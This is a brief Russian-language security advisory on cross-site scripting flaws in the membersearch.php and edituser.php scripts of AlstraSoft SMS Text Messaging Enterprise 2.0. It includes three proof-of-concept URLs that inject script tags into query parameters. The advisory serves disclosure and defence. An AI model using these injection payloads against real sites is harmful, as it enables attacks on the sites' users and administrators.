Программа: AlstraSoft SMS Text Messaging Enterprise 2.0

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в сценариях membersearch.php и edituser.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.example.com/admin/membersearch.php?pagina=17 &q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

http://www.example.com/admin/edituser.php?userid=Walltrapas "><script>alert()</script>

http://www.example.com/admin/membersearch.php?q=%22%3E%3C script%3Ealert%28%29%3C%2Fscript%3E&B1=Submit



Оставить мнение